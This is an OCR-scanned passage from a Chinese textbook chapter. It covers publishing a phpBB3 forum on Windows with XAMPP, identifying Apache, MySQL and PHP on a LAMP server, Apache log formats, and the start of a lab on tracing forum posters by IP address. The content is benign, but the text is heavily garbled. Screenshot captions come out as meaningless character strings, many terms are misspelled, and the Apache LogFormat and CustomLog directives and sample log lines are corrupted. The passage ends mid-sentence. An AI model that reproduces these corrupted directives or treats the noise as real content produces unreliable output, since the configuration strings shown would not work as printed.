点 击 下 面 的 链接 将 带 您 到 管理 员 控制 面板 《ACP) 下 提交 统计 数据 的 界面 . 花 一 些 时 间 检 查 设置 选项 是 否 可 用 . 记 住 可 以 使 用 在 线 帮助 文档 位 
于 文 着 和 技术 支持 版 面 ,查看 README 以 得 到 更 会 的 信息 


请 在 使 用 论坛 前 日 除 , 移动 或 重 命 名 install 文 首 卖 . 如 果 这 个 文件 夹 存在 , 只 有 阁 理 负 控 制 面板 才 可 以 访问 . 


要 入 论坛 


图 5-14 phpBB 论坛 安装 成 功 界面 
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单 击 " 登 入 论坛 "按钮 ,进入 论坛 “管理 员 控制 面板 ”, 在 该 页 面 内 进入 “论坛 首页 ”, 如 
图 5-15 所 示 。 


从 入 和 用户 和 位 衣 ( 于 村 去 分 罗 由 的 用 户 尖 动 条 ; 
15 247 


摘 计 信息 
由 并。 主题 总 时， 。 注 所 玫 忆 吕 娄 ;二 。 第 用 户 admmin 


OE gpk 去 丰 区 为 UTC 


Powered by phpRB © 2000, 2003, 2005, 3007 phpae Greup 
间 伯 字 广 二 由 PHPES 守 计生 失 护 代 作 
从 办 而 寺 太 寻 


图 5-15 ”phpBB 论坛 首页 


国 | Windows 平 合 下 发 布 PHP 网 站 _ 


PHP 网 站 多 数 情况 下 工作 运行 在 LAMP 平台 中 ,但 有 时 在 检验 工作 中 为 了 便于 固 
定 网 页 证 据 , 需 要 快速 发 布 访问 PHP 网 站 文件 ,但 是 由 于 大 多 数 人 对 Linux 操作 系统 不 
熟悉 ,尤其 是 一 些 操 作 命令 记 不 住 , 那 么 就 可 以 选择 在 Windows 操作 系统 平台 下 基于 图 
形 界面 来 快速 发 布 PHP 网 站 。 

【 实 训 5-2】 在 本 机 Windows 操作 系统 上 建立 PHP 网 站 运行 平台 发 布 phpbb3 开 
源 论坛 ,网 站 源码 文件 为 phpbb3. 0.7_pll_zh_phpbbchina. zip, 位 于 d:\lamp 文件 夹 内 。 


1. 建立 PHP 网 站 运行 平台 

同 LAMP 平台 一 样 , 要 支持 运行 PHP 网 站 文件 ,同样 要 在 Windows 系统 下 分 别 安 
装 Apache、MySQL 及 PHP 软件 。 为 了 提高 效率 ,可 以 选择 集成 安装 软件 ,如 XAMPP、 
AppServ 等 ,只 要 一 键 安装 就 可 以 把 PHP 环境 给 搭建 好 。 以 XAMPP 为 例 , 其 中 集成 了 
多 种 安装 组 件 , 如 图 5-16 所 示 。 

安装 完成 后 ,打开 XAMPP Control Panel 窗口 ,开启 相应 服务 ,如 图 5-17 所 示 。 


2. 发 布 PHP 网 站 
通过 前 面 操作 ,已 经 在 Windows 操作 系统 下 成 功 安装 了 Apache、MySQL 及 PHP， 
假设 XAMPP 的 安装 目录 为 C:\xampp, 则 Apache 的 安装 目录 为 C:\xampp\apache， 
MySQL 的 安装 目录 为 “C:\xampp\mysql”, 接 下 来 可 通过 以 下 方法 快速 发 布 PHP 网 站 。 
名 准备 待 发 布 的 网 站 源码 至 特定 目录 中 ,如 下 :\phpbb3. 0.7_zh_phpbbchina。 
@ 修改 Apache 配置 文件 。 
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Select Components 


Select the components you want to install: clear the components you do not want 
to install. Click Next when you are ready to continue. 


oe | Click on a component to get a detailed 
description 


日 回 s 


入 


Mpache 
MySQL 
FileZilla FTP Server 
Hercury Nail Server 
Tomcat 


SISISISIs 


ogram Languages 
PHP 

Perl 

ogram Languages 
phpltyAdnin 
Webalizer 
Fake Sendnail 


BIS 


4 


SSI 


XANPP Instsller — 


图 5-16 XAMPP 安装 界面 


XANPP Control Panel v3.2.1 [ Compiled: Way Tth 2013 ] 


XAMPP Control Panel v3.2.1 


Modules 
Service Module PiD(s) Portls) Actions 


5056 [shor | 
Apache 3680 Stop Config 国 Shell 


MySQL 4844 Stop Config Explorer 


国 Netstat 


FileZila Start 4 Config 最 Sevices 


Mercury Start Ad Config 入 Help 


Tomcat Ad Config 时 Quit 


[Apache] ivileges, | y e od. 四 
[Apache] 

[Apache] 

[Apache] 

[Apache] 

[Apache] Attempting to start Apache app... 

[Apache] Status change detected: ruming 

[mysql] Attempting to start MySQL app... 

[nysql] Status change detected: ruming 


图 5-17 XAMPP Control Panel 窗口 


跳 转 到 Apache 的 安装 目录 “C:\xampp\apache” 下 ,找到 配置 文件 httpd. conf, 进 行 
如 下 修改 : 
。 将 DocumentRoot "C:\xampp\htdocs" 替换 为 DocumentRoot "F:\phpbb3.0.7_ 
zh_phpbbchina"; 
。 将 二 Directory "C:\xamppN\htdocs" 二 替换 为 二 Directory "F:\phpbb3. 0.7_zh_ 
phpbbchina">。 
@ 在 “XAMPP Control Panel” 窗 口中 重新 启动 Apache 服务 。 


157 


网 站 构建 分 析 wm 


@ 访问 网 站 安装 向 导 。 

通过 上 述 操 作 , 已 经 完成 了 网 站 前 台 的 发 布 工 作 , 在 客户 端 启动 浏览 器 ,输入 http:// 
127. 0.0.1 即 可 看 到 网 站 安装 向 导 , 如 图 5-6 所 示 。 

@ 根据 安装 向 导 发 布 网 站 。 

当 进 行 到 输入 数据 库 参 数 时 ,需要 手动 创建 数据 库 ,步骤 如 下 : 

首先 ,在 图 5-17 中 的 XAMPP Control Panel 窗口 中 单 击 MySQL 菜单 中 的 Admin 
按钮 ,打开 phpMyAdmin 主页 ,其 中 找到 新 建 数据 库 页 面 如 图 5-18 所 示 , 在 其 中 输入 数 
据 库 名 称 , 如 phpbbdb。 


€ 3 © |B localhost/phpmyadmin/#PIAURL-4:server_databases. php?db=&table=&server=18target=&token= 
phpMyAdmin 
ABonNe 回 数据 库 回 SQL 季 状态 器 用 户 局 导出 图 导入 四 设 置 
(人 曲 近 使 用 的 表 ) - 司 | 
cdcol 
information_schena 
i 局 新 建 数 所 库 各 
加 performance_schena [phpbbdb | 整理 国 创建 
数据 库 。 
口 cacol ai 检查 权限 
infornation_schena 四 检查 权限 
nysql ai 检查 权限 
perfornance_schena m9 检查 权限 
口 phpmyadnin ai 检查 权限 
器 test 天 检查 权限 
口 webauth 检查 权限 
一 上 总计: 1 
人 回 全 选 过 中 硕 。 羡 出 涤 


图 5-18 新 建 数据 库 页 面 


然后 , 跳 转 到 用户? 管理 界面 ,选择 root localhost 用 户 , 对 其 进行 权限 编辑 ,如 图 5-19 
所 示 。 


© 3 © |D localhost/phpmyadmin/ 
phpMyAdmin 3 
ABonse 回 数据 库 证 5QL 好 状态 吕 用 户 | 辕 导出 | 园 导入 
| 塌 近 使 用 的 表 ) -图 | 
用 户 概况 
国 - 生 cdcol 
information_schema 
加 nysal 用 户 主机 。 室 码 全 局 权限 授权 操作 
Ee performance_schena 口 任意 % — USAGE 否 ”已 编 强权 限 忆 导出 
i 回 任意 linx 否 vskhce 否 。 谨 编辑 权限 图 导出 
i 口 EE localhost isk 知已 织 权限 语 寺 出 
ee 回 pna localhost 否 WSAGE 否 ”大 编辑 权限 转 导出 
口 root limux 否 ”ALL PRIVILEGES 是 局 编辑 权限 已 导出 
侍 。 回 全 选 交大 性 导出 


图 5-19 用 户 管理 界面 
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在 权限 编辑 管理 界面 中 ,设置 root 用 户 密码 ,如 图 5-20 所 示 。 


© 3 © BD localhost/phpmyadmin/ 
phpMyAdmin 国 127.0.0.1 有 
ABone 园 _ 数据库， 加 saL | 克 状态 号 用户 | 园 导出 | 国 导入 | 设置 
CR 二 天 二 放 十 权 本 下 
| 坊 近 使 用 的 表 ) 。 。 图 | 
数据 库 权限 授权 按 表 指定 权限 操作 
习 cdcol 无 
围 - information_schena 
国 羡 sa 在 下 列 数据 库 添加 权限 : | 使 用 文本 域 ~ 9 
因 - 可 perfornance_schena 
多 -gg phpbbdb 
国 -g phpnyadnin 
围 -加 test 
转 - 加 vebauth 
| l 
从 改定 码 
〇 无 宇 码 
Sa JRAC 
密码 加 密 方式 : @NySQL 4. 1+ 
ODSQL 4.0 兼容 
生成 密码 E83| | 


图 5-20 设置 root 用 户 密 码 


最 后 ,在 数据 库 设置 界 面 输入 服务 器 地 址 为 127. 0. 0. 1 ,数据 库 名 称 为 刚 创建 的 
phpbbdb ,用 户 名 为 root ,密码 为 前 面 设 置 的 密码 ,如 图 5-21 所 示 。 


} Fy, 
oe le 
WAN 


遂 合 信和 且 | 全 新 安装 | 转 氏 染 作 


由 数 闫 库 设 加 
~ 检测 需求 _ 
汝 舌 库 设置 数据 库 天 型 - [wsQL | 
管理 凡人 息 数据 库 服务 器 地 址 ,或 DSN: 127.0.0.1 
配置 文件 DSN fa 司 好 大 总 关 ， 训 只 与 ODBC 于 天 
二 横生 和 数 磊 库 服 务 黑 莹 口 ; 
和 据 表 下 局 交 本 ， 大 大多 大 宅 关 条 各 认 折 一 个 和 村 内 罗 品 
完成 数据 库 名 称 : phpbbdb 
数据 库 用 户 名 : root 
数 拓 库 衬 码 : eee 
为 数 基 库 中 的 表格 名 称 尖 加 前 组 : phpbb_ 
| 要 过 进行 下 一 上 


图 5-21 “数据 库 设置 ?界面 


在 Windows 操作 系统 下 ,按照 网 站 安装 向 导 进 行 发 布 的 其 余 设置 与 5.4 节 中 LAMP 
台 下 发 布 PHP 网 站 操作 一 致 ,这 里 不 再 详 述 。 
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“5.6 _ LAMP 平 台中 PHP 网 站 分 析 


56.1 LAMP 平台 特征 分 析 


LAMP 平台 在 搭建 及 运行 过 程 中 ,每 个 软件 都 会 在 操作 系统 上 生成 自己 的 目录 结构 
或 进程 ,可 以 用 来 确定 网 站 的 运行 平台 。 


1. Apache 特征 分 析 

Linux 系统 下 是 否 安装 Apache 的 最 主要 特征 就 是 能 和 否 找到 它 的 主要 配置 文件 
httpd. conf ,在 配置 文件 中 查找 "ServerRoot ”指令 ,其 对 应 的 值 表 明 Apache 的 安装 主 目 
录 , 如 ServerRoot“/usr/local/apache”, 安 装 主 目录 下 的 关键 子 目录 有 : 

*。“bin/ ”包含 Apache 的 命令 文件 ; 

。“htdoc/ ”默认 网 站 的 源码 文件 所 在 目录 ; 

。“logs/” 网 站 访问 日 志 及 错误 日 志 的 默认 目录 ; 

*。“conf/” 配 置 文件 的 默认 目录 ， 

。“modules/” 加 载 模块 所 在 的 目录 。 

判断 Apache 是 否 正在 运行 可 用 # ps -el grep httpd 命令 ,查看 是 否 有 相应 的 服务 进 
程 ,如 图 5-22 所 示 。 


[root@localhost modules]# ps -~e | grep httpd 


19012 ? 00:00:00 httpd 
19233 ? 00:00:00 httpd 
19234 ? 00:00:00 httpd 
19235 ? 00:00:00 httpd 
19236 ? 00:00:00 httpd 
19237 ? 00:00:00 httpd 
19243 ? 00:00:00 httpd 
19244 ? 00:00:00 httpd 
19245 ? 00:00:00 httpd 
19246 ? 00:00:00 httpd 
19247 ? 00:00:00 httpd 


图 5-22 Apache 服务 器 运行 进程 


或 使 用 上 # netstat -tnl 查看 是 否 开放 Web 的 默认 端口 80 .如 图 5-23 所 示 。 


[root@localhost modules]# netstat -tnl 
Active Internet connections (only servers) 


LISTEN 


Proto Recv-Q Send-Q Local Address Foreign Address State 
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 
tcp 0 0.0.0.0:* LISTEN 
tcp 0 0.0.0.0:* LISTEN 
tcp 0 0.0.0.0:* LISTEN 
tcp 0 0.0.0.0:” LISTEN 

0 HH 

0 
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2. MSQ 特征 分 析 

MySQL 数据 库 的 主要 配置 文件 为 my. cnf 或 my. ini, 里 面 的 关键 参数 basedir 指定 
目录 为 MySQL 安装 目录 ,datadir 指定 数据 库 文件 读 取 目录 ; 若 在 系统 中 找 不 到 my. cnf 
或 my. ini 文 件 , 或 在 配置 文件 中 找 不 到 basedir 及 datadir 等 重要 参数 , 则 可 使 用 # ps -ef 
命令 查看 系统 后 台 进 程 , 若 MySQL 数据 库 启动 ,可 看 到 启动 进程 MySQL 后 面 跟着 的 
basedir 等 重要 参数 。 


root 19815 20824 0 08:42 pts/2 00:00:00 ps -ef 
root 20741 2674 0 Marl5 pts/1 00:00:00 /bin/sh ./bin/mysqld_safe 一 user=mysql 
mysql 20809 20741 0 Marl5 pts/1 00:00:11 /usr/local/mysql/bin/nysqld —basedir=/usr/local/mysgl 


—user=mysql —log-error=/var/log/mysqld.log —pid-file=/var/run/mysqld/mysqld 
.pid —socket=/var/lib/mysql/mysql .sock 


root 20824 2671 0 Marl5 pts/2 00:00:00 bash 
[root@localhost tmp]# 


图 5-24 MySQL 进程 信息 


对 图 5-24 内 容 进行 分 析 ,MySQL 数据 库 的 安装 目录 为 /usr/local/mysql, 数 据 库 文 
件 的 读 取 目 录 为 /var/lib/mysql。 
MySQL 的 关键 子 目录 有 : 
。 bin/ 包 含 MySQL 的 命令 文件 ,如 mysqld_safe、mysql 等 启动 连接 数据 库 命令 ; 
。 data/ 为 数据 库 及 表 文 件 的 默认 目录 ; 
。 scripts/ 是 脚本 文件 所 在 目录 ,如 mysql_install_db 创建 授权 表 及 默认 数据 库 脚 本 
文件 。 es [root@localhost tmp]# ps -elgrep mysql 
判断 MySQL 是 否 正 在 运行 可 以 用 # ps-e | 19045 pts/1 00:00:00 mysal 
grep mysql 命令 查看 是 否 有 相应 的 服务 进程 ， 3934s 9th。 90:00:99 下 和 et 
如 图 5-25 所 示 。 图 5-25 mysal 进程 列表 
或 使 用 # netstat -tnl 查看 是 否 开放 MySQL 
的 默认 端口 3306 ,如 图 5-26 所 示 。 


[root6localhost modules]# netstat -tnl 
Active Internet connections (only servers) 
Proto Recv-Q Send-Q Local Address 


Address State 
* 


0 0 .0.0.0.0:3306, LISTEN 
tcp 0 : LISTEN 
tcp 0 LISTEN 
tcp 0 LISTEN 
tcp 0 LISTEN 
tcp 0 LISTEN 
tcp 0 LISTEN 


图 5-26 ”MySQL 默认 端口 


3. PHP 安装 特征 分 析 
PHP 是 作为 Apache 的 一 个 扩展 模块 进行 安装 的 ,不 能 独立 运行 ,必须 依托 于 
Apache 服务 器 。 可 以 从 Apache 的 主 配 文件 httpd. conf 查找 LoadModule 指令 ,如 
“LoadModule php5_module modules/libphp5. so”, 定 位 到 Apache 已 经 动态 加 载 PHP5。 
PHP 的 配置 文件 是 php. ini, 默 认 在 PHP 安装 目录 的 etc 子 目录 下 ,修改 PHP 配置 文件 ， 
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必须 重启 Apache 服务 器 才能 使 修改 的 PHP 参数 设置 生效 。 
562 Apache 日 志 分 析 


由 于 Web 软件 的 不 同 ,Apache 在 运行 过 程 中 所 生成 日 志 与 IIS 日 志 在 名 称 及 格式 
方面 略 有 差异 ,但 是 其 分 析 方法 与 IIS 日 志方 法 类 似 。 


1. 日志 位 置 

如 果 Apache 在 安装 过 程 中 采用 默认 设置 , 则 在 安装 主 目录 中 的 logs 子 目录 下 就 会 
生成 两 个 文件 ,分别 是 access_log 和 error_log。access_log 为 访问 日 志文 件 , 记 录 所 有 对 
Apache 服务 器 进行 请 求 的 访问 信息 ,无论 请 求 是 否 成 功 , 都 会 被 记录 到 访问 日 志文 件 中 ; 
error_log 为 错误 日 志文 件 , 记 录 下 任何 错误 的 处 理 信息 ,通常 服务 器 出 现 什么 错误 ,可 对 
它 进 行 分 析 。 

访问 日 志 的 非 默认 位 置 及 名 称 由 CustomLog 指令 控制 。 例 如 ,可 在 Apache 的 主 配 
文件 httpd. conf 中 搜索 该 指令 ,可见 “CustomLog Log/access_log' common” 语 句 , 表 明 访 
问 日 志 位 于 Apache 服务 器 安装 目录 下 的 Log 子 目录 下 ,名 称 为 access_log”。 

错误 日 志 的 非 默认 位 置 及 名 称 由 ErrorLog 指令 控制 。 例 如 ,可 在 Apache 的 主 配 文 
件 httpd. conf 中 搜索 该 指令 ,可见 “ErrorLog 'Log/error_log” 语 句 , 表 明 错 误 日 志 位 于 
Apache 服务 器 安装 目录 下 的 “Log” 子 目录 下 ,名 称 为 “error_log”。 


2. 日 志文 件 格式 

在 网 站 运行 过 程 中 ,访问 日 志 真 实 记载 了 每 条 对 网 站 的 访问 连接 情况 ,包括 了 访问 主 
机 的 IP 地 址 \ 访 问 时 间 、 所 查看 的 内 容 等 重要 信息 。 与 IIS 日 志 类 型 ,Apache 日 志 也 有 
以 下 几 种 常用 格式 。 

(1) 通用 日 志 格式 

该 格式 为 Apache 默认 使 用 的 日 志 记 录 格 式 , 在 httpd 配置 文件 中 可 见 如 下 内 容 : 


LogFormat %h% 1 %u%t \%r\” %>s%b” comn 
CustonLog Log/access_ log common 


LogFormat 指令 定义 了 一 种 特定 的 记录 格式 字符 串 ,并 给 它 起 了 个 别名 叫 common， 
其 中 的 “%” 指 示 服 务 器 用 某 种 信息 替换 ,其 他 字符 则 不 作 圭 换 。 引 号 (") 必 须 加 反 斜 杠 转 
义 , 以 避免 被 解释 为 字符 串 的 结束 。 格 式 字 符 串 还 可 以 包含 特殊 的 控制 符 ,如 换行 符 
“\n”、 制 表 符 “\t”。 

CustomLog 指令 建立 一 个 使 用 指定 别名 的 新 日 志文 件 , 除 非 其 文件 名 是 以 斜 杠 开 头 
的 绝对 路 径 ,否则 其 路 径 就 是 相对 于 ServerRoot 的 相对 路 径 。 

上 述 配置 是 一 种 被 称 为 通用 日 志 格 式 (CLF) 的 记录 格式 , 它 被 许多 不 同 的 Web 服务 
器 所 采用 ,并 被 许多 日 志 分 析 程 序 所 识别 , 它 产生 的 记录 形 如 ， 


127.0.01- frank [10/0ct/2000:13:55:36- 0700] “GET /apache_pb. gif HTTP/1.0” 
200 2326 


记录 的 各 部 分 说 明 如 下 : 
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© 127.0.0.1C(%h) 

这 是 发 送 请 求 到 服务 器 的 客户 的 IP 地 址 。 如 果 HostnameLookups 设 为 On , 则 服 
务 器 会 尝试 解析 这 个 IP 地 址 的 主机 名 并 替换 此 处 的 IP 地 址 ,但 并 不 推荐 这 样 做 ,因为 它 
会 显著 拖 慢 服务 器 ,最 好 是 用 一 个 日 志 后 续 处 理 器 来 判断 主机 名 ,如 logresolve 。 如 果 客 
户 和 服务 器 之 间 存 在 代理 ,那么 记录 中 的 这 个 IP 地 址 就 是 那个 代理 的 IP 地 址 ,而 不 是 客 
户 机 的 真实 IP 地 址 。 

©® -(%1) 

这 是 由 客户 端 identd 进程 判断 的 RFC1413 身份 (identity) ,输出 中 的 符号 “-” 表 示 此 
处 的 信息 无 效 。 除 非 在 严格 控制 的 内 部 网 络 中 ,此 信息 通常 很 不 可 靠 , 不 应 该 被 使 用 。 只 
有 将 IdentityCheck 指令 设 为 On 时 ,Apache 才 会 试图 得 到 这 项 信息 。 

© frank( %u) 

这 是 HTTP 认证 系统 得 到 的 访问 该 网 页 的 客户 标识 (userid) ,环境 变量 REMOTE_ 
USER 会 被 设 为 该 值 并 提供 给 CGI 脚本 。 如 果 状 态 码 是 401, 表 示 客 户 未 通过 认证 , 则 此 
值 没有 意义 。 如 果 网 页 没有 设置 密码 保护 , 则 此 项 将 是 “-”。 

@ [10/Oct/2000:13:55:36-0700] (%tb 

这 是 服务 器 完成 请 求 处 理 时 的 时 间 ,其 格式 是 : 

[日 /月 /年 :时 :分 : 秒 时 区 ] 

日 =2 数字 

月 =3 字母 

年 二 4 数字 

时 二 2 数字 

分 =2 数字 

秒 二 2 数字 

时 区 =( 十 | 一 )4 数字 

可 以 在 格式 字符 串 中 使 用 %{format}t 来 改变 时 间 的 输出 形式 ,其 中 的 format 与 
C 标准 库 中 的 strftime() 用 法 相同 。 

© "GET /apache_pb. gif HTTP/1.0"(\"%r\") 

引号 中 是 客户 端 发 出 的 包含 许多 有 用 信息 的 请 求 行 。 可 以 看 出 ,该 客户 的 动作 是 
GET ,请 求 的 资源 是 /apache_pb. gif ,使 用 的 协议 是 HTTP/1.0 。 另 外 ,还 可 以 记录 其 他 
信息 ,如 格式 字符 串 "%m %U%q %H" 会 记录 动作 、 路 径 、 查 询 字符 串 、 协 议 ,其 输出 
和 "%r" 一 样 。 

© 200(%>s) 

这 是 服务 器 返回 给 客户 端的 状态 码 。 这 个 信息 非常 有 价值 ,因为 它 指示 了 请 求 的 结 
果 ,或 被 成 功 响 应 了 (以 2 开头 ) ,或 被 重 定 向 了 (以 3 开头 ) ,或 出 错 了 (以 4 开头 ) ,或 产生 
了 服务 器 端 错误 (以 5 开头 )。 完 整 的 状态 码 列表 参见 HTTP 规范 (RFC2616 ,参见 第 
10 章 ) 。 

©® 2326(%b) 

最 后 这 项 是 返回 给 客户 端的 不 包括 响应 头 的 字 节 数 。 如 果 没 有 信息 返回 , 则 此 项 应 
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该 是 一 ”; 如 果 和 希望 记录 为 0 的 形式 ,就 应 该 用 %B。 
(2) 组 合 日 志 格式 
另 一 种 常用 的 记录 格式 是 组 合 日 志 格式 ,其 形式 如 下 : 


LoegFormat %h% 1 %u%t\%r\” %>s%b \% fReferer}i\” \% User- agent} i\” cabined 

Qustonl og log/access log conbined 

这 种 格式 与 通用 日 志 格 式 类 似 , 但 是 多 了 两 个 % {header)i 项 ,其 中 的 header 可 以 是 
任何 请 求 头 。 这 种 格式 的 记录 形 如 ， 


127.0.0 1- frank [10/0ct/2000:13:55:36- 0700] “GET /apache_pb. gif HTTP/1.0” 200 
2326 “http://wm. exanple. com/start. html” “Mozilla/4.08 [en] Win98: | :Nav)” 


其 中 ,多 出 来 的 项 是 : 

四 "http://www. example. com/start. html" (\"% {Referer}i\") 

Referer 请 求 头 。 此 项 指明 了 该 请 求 是 被 从 哪个 网 页 提交 过 来 的 ,这 个 网 页 应 该 包 
含 /apache_pb. gif 文件 或 者 链接 。 

@ "Mozilla/4. 08 [en] (Win98; I ;Nav)" (\"% {User-agent}i\") 

User-Agent 请 求 头 。 此 项 是 客户 端 提供 的 浏览 器 识别 信息 。 

(3) 多 文件 访问 日 志 

可 以 简单 地 在 配置 文件 中 用 多 个 CustomLog 指令 来 建立 多 文件 访问 日 志 。 例 如 ,下 
列 命 令 既 记录 基本 的 CLF 信息 ,又 记录 提交 网 页 和 浏览 器 的 信息 ,最 后 两 行 CustomLog 
示范 了 如 何 模 拟 ReferLog 和 AgentLog 指令 的 效果 。 


LogFormat %h% 1 %u%t\%r\” %>s%b” comn 

CustonLog logs/access_log common 

CustoanLog logs/referer_log "% {Referer}i- >%U” 

Qustonl og logs/agent_log % {User- agent} i” 

此 例 也 说 明了 记录 格式 可 以 直接 由 CustomLog 指定 ,而 并 不 一 定 要 用 LogFormat 
起 一 个 别名 。 

(4) 虚拟 主机 访问 日 志 

如 果 服 务 器 配 有 若干 虚拟 主机 ,那么 还 有 几 个 控制 日 志文 件 的 功能 。 首 先 ,可 以 把 日 
志 指 令 放 在 二 VirtualHost 二 段 之 外 ,让 它们 与 主 服务 器 使 用 同一 个 访问 日 志和 错误 日 志 
来 记录 所 有 的 请 求 和 错误 ,但 是 这 样 就 不 能 方便 的 获得 每 个 虚拟 主机 的 信息 了 。 

如 果 把 CustomLog 或 ErrorLog 指令 放 在 二 VirtualHost 二 段 内 .所 有 对 这 个 虚拟 主 
机 的 请 求 和 错误 信息 会 被 记录 在 其 私有 的 日 志文 件 中 :那些 没有 在 二 VirtualHost 二 段 内 
使 用 日 志 指 令 的 虚拟 主机 将 仍然 和 主 服务 器 使 用 同一 个 日 志 。 这 种 方法 对 虚拟 主机 较 少 
的 服务 器 很 有 用 ,但 虚拟 主机 非常 多 时 ,就 会 带 来 管理 上 的 困难 ,还 经 常会 产生 文件 描述 
符 短缺 的 问题 。 

因此 ,对 于 访问 日 志 , 有 一 个 很 好 的 折 中 方案 ,在 同一 个 访问 日 志文 件 中 记录 对 所 有 
主机 的 访问 ,而 每 条 记录 都 注 明 虚 拟 主机 的 信息 ,日 后 再 把 记录 拆 开 存 人 不 同 的 文件 。 

例如 : 
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LogFormat %v %| %u%t\%r\” %>s%b”comonvhost 

Qustonl og logs/access log comonvhost 

其 中 ,%v 用 来 附加 虚拟 主机 的 信息 。 有 个 split-logfile 程序 可 以 根据 不 同 的 虚拟 主 
机 信息 对 日 志 进 行 拆 分 ,并 将 结果 存 人 不 同 的 文件 。 


3. 日 志 字 段 解析 

LogFormat 指令 设 定 的 格式 化 参数 是 一 个 字符 串 。 这 个 字符 串 会 在 每 次 请 求 发 生 
的 时 候 , 被 记录 到 日 志 中 去 。 它 可 以 包含 将 被 原样 写 人 日 志 的 文本 字符 串 以 及 C 风格 的 
控制 字符 “\n” 和 “\t” 以 实现 换行 与 制 表 。 文 本 中 的 引号 和 反 斜 杠 应 通过 “\ "来 转 义 。 请 
求 本 身 的 情况 将 通过 在 格式 字符 串 中 放置 各 种 “%” 转 义 符 的 方法 来 记录 ,在 写 人 日志 
件 时 ,根据 如 表 5-1 所 示 的 定义 进行 转换 。 


表 5-1 Apache 日 志 格 式 字 符 串 


格式 字符 串 描述 

%% 百 分 号 (Apache2. 0. 44 或 更 高 的 版 本 ) 

%a 远 端 IP 地 址 

%A 本 机 IP 地 址 

%B 除 HTTP 头 以 外 传送 的 字 节 数 

wb 以 CLF 格式 显示 的 除 HTTP 头 以 外 传送 的 字 节 数 ,也 就 是 当 没有 字 节 传送 时 显示 
一 而 不 是 0 

% {Foobar}C 在 请 求 中 传送 给 服务 端的 cookieFoobar 的 内 容 

%D 服务 器 处 理 本 请 求 所 用 时 间 ,以 微 为 单位 

%{FOOBAR)e | 环境 变量 FOOBAR 的 值 

%f 文件 名 

%h 远 端 主机 

%H 请 求 使 用 的 协议 

% {Foobar)i 发 送 到 服务 器 的 请 求 头 Foobar: 的 内 容 

wl | 由 identd 而 来 ,如 果 支 持 的 话 ) ,除非 IdentityCheck 设 为 On, 否 则 将 得 

%m 请 求 的 方法 

% {Foobar}n 来 自 另 一 个 模块 的 注解 Foobar 的 内 容 

% {Foobar}o 应 答 头 Foobar: 的 内 容 

%p 服务 器 服务 于 该 请 求 的 标准 端口 

%P 为 本 请 求 提供 服务 的 子 进程 的 PID 

% {format}P 服务 于 该 请 求 的 PID 或 TID( 线 程 ID) ,format 的 取 值 范围 为 pid 和 tid(2.0.46 及 
以 后 版 本 ) 以 及 hextid( 需 要 APR1. 2.0 及 以 上 版 本 ) 


165 


网 站 构建 分 析 wm 


续 表 
格式 字符 串 描 述 
%a 查询 字符 串 ( 若 存在 则 由 一 个 “?? 引 导 ,否则 返回 空 串 ) 
Wr 请 求 的 第 一 行 
ws 状态 。 对 于 内 部 重 定向 的 请 求 , 这 个 状态 指 的 是 原始 请 求 的 状态 ,--% 二 s 则 指 的 


是 最 后 请 求 的 状态 


时 间 , 用 普通 日 志 时 间 格 式 (标准 英语 格式 ) 


时 间 , 用 strftime(3) 指 定 的 格式 表示 的 时 间 。( 默 认 情况 下 按 本 地 化 格式 ) 


%T 处 理 完 请 求 所 花 时 间 , 以 秒 为 单位 
Wu 远程 用 户 名 (根据 验证 信息 而 来 ;如 果 返 回 status(%s) 为 401, 可 能 是 假 的 ) 
%U 请 求 的 URL 路 径 , 不 包含 查询 字符 串 
%v 对 该 请 求 提供 服务 的 标准 ServerName 
%V 根据 UseCanonicalName 指令 设 定 的 服务 器 名 称 
请 求 完 成 时 的 连接 状态 : 
X 一 连接 在 应 答 完成 前 中 断 
% 十 一 应 答 传送 完 后 继续 保持 连接 
一 一 应 答 传送 完 后 关闭 连接 
(在 1.3 以 后 的 版 本 中 ,这 个 指令 是 %c, 但 这 样 就 和 过 去 的 SSL 语法 %{var}c 冲 
突 了 ) 
%I 接收 的 字 节 数 ,包括 请 求 头 的 数据 ,并 且 不 能 为 零 。 要 使 用 这 个 指令 你 必须 启用 
mod_logio 模块 
%O 发 送 的 字 节 数 ,包括 请 求 头 的 数据 ,并 且 不 能 为 零 。 要 使 用 这 个 指令 你 必须 启用 


mod_logio 模块 


在 Apache 2.0 版 本 中 (不 同 于 1.3),%b 和 %B 格式 字符 串 并 不 表示 发 送 到 客户 端 
的 字 节 数 , 而 只 是 简单 的 表示 HTTP 应 答 字 节 数 (在 连接 中 断 或 使 用 SSL 时 与 前 者 有 所 
不 同 )。mod_logio 提供 的 %O 格式 字符 串 将 会 记录 发 送 的 实际 字 节 数 。 


4. 日 志 分 析 方 法 

对 Apache 日 志 进 行 分 析 操 作 可 参考 2. 3. 1 节 , 同 IIS 日 志 分 析 一 样 ,可 将 大 量 的 日 
志 信 息 进 行 预 处 理 后 导入 到 SQL Server 数据 库 中 ,再 根据 关键 信息 构建 SQL 语句 进行 
过 滤 分 析 , 也 可 以 使 用 专业 的 日 志 分 析 工 具 如 Log Parser 等 进行 分 析 。 


563 敏感 信息 源 追 查 


PHP 网 站 在 运行 过 程 中 ,同样 用 户 的 任意 页 面 访问 、 数 据 提交 等 操作 都 会 在 服务 器 
端 产生 相应 痕迹 ,本 节 讨 论 PHP 论坛 网 站 出 现 虚假 .敏感 信息 后 ,该 如 何 进 行 追查 ,并 分 
析 可 疑 的 发 帖 人 。 
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1. 追查 目标 

通过 2. 3. 3 节 的 分 析 , 可 知 若 网 站 出 现 敏感 .虚假 等 信息 ,造成 严重 后 果 , 想 要 定位 是 
谁 发 布 的 该 信息 。 在 实际 网 站 分 析 过 程 中 ,具体 追查 目标 就 是 发 帖 计算 机 的 IP 地 址 信息 
和 发 帖 时 间 ,而 发 帖 时 间 通 常 在 网 站 论坛 相应 版 面 上 可 找到 ,需要 着 重 追 查 发 帖 计算 机 的 
IP 地 址 信息 。 


2. 实例 分 析 

PHP 网 站 的 敏感 信息 追查 思路 参见 2. 3. 3 节 内 容 , 本 节 直 接 以 实例 说 明 PHP 网 站 
信息 追查 过 程 。 

【 实 训 5-3】 在 虚拟 机 Red Hat Enterprise Linux 5.0 下 安装 httpd-2. 2. 15 .php5. 3.2 及 
MySQL5. 1.45 软件 ,并 通过 Apache 发 布 了 PHPBB3 开源 论坛 。 作 为 网 站 服务 器 ,该 虚 
拟 机 IP 地 址 为 192. 168. 111. 128 ,端口 为 默认 端口 80 ,客户 机 与 虚拟 机 的 联网 方式 为 
